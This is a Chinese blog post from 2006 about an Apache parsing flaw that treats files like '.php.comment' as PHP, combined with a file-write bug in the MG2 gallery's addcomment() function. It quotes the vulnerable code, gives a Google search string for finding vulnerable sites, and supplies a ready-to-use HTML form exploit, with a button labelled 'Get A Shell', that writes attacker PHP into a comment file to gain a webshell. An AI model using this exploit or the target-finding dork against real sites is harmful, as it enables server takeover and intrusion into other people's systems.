December
26th
2006
Apache最新安全漏洞与利用!
评分: 
Loading ...描述: 任意以.php开头的文件名,Apache都当做php文件解析, 如”.php.comment”将被当做php文件解析,由此引发一系列漏洞.
MG2是在国外非常流行的一个PHP+HTML的图片管理程序,由于商业版被破解,程序流传甚广,在google搜索关键字为”Powered by MG2 v0.5.1″ 最新版本存在着文件写入漏洞,可配和Apache漏洞直接得shell
includes/mg2_functions.php中addcomment()函数如下
CODE:
- function addcomment() {
- $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
- $_REQUEST['input'] = $this->charfix($_REQUEST['input']);
- $_REQUEST['email'] = $this->charfix($_REQUEST['email']);
- $_REQUEST['name'] = $this->charfix($_REQUEST['name']);
- $_REQUEST['input'] = strip_tags($_REQUEST['input'], "");
- $_REQUEST['input'] = str_replace("\n","
- ",$_REQUEST['input']);
- $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
- if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
- $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
- $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
- $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
- $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
- if (count($comment_exists) == 0) {
- $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
- $this->writecomments($_REQUEST['filename'] . ".comment");
- ........
漏洞很明显,可以自定义comment的文件名,如果你自定义的filename为”.php”,那么程序就会在图片根目录下生成一 个”.php.comment”的文件,由于Apache的漏洞,该程序被当做php文件解析,webshell就到手了,写了个利用程序如下:
CODE:
- <form action="http://localhost/mg2/index.php" method="post">
- <input type="hidden" value="You Are Owned" name="input">
- <input type="hidden" value="abc@abc.com" name="email">
- <input type="hidden" value=".php" name="filename">
- <input type="hidden" value="addcomment" name="action">
- <textarea name="name" rows="10" cols="30"></textarea>
- <input type="submit" value="Get A Shell"></form>
相关文章阅读
喜欢这篇文章?
订阅我的RSS,就可以自动获取最新内容了!
评论数量: 没有评论
引用: http://www.i4wei.com/2006/12/5/
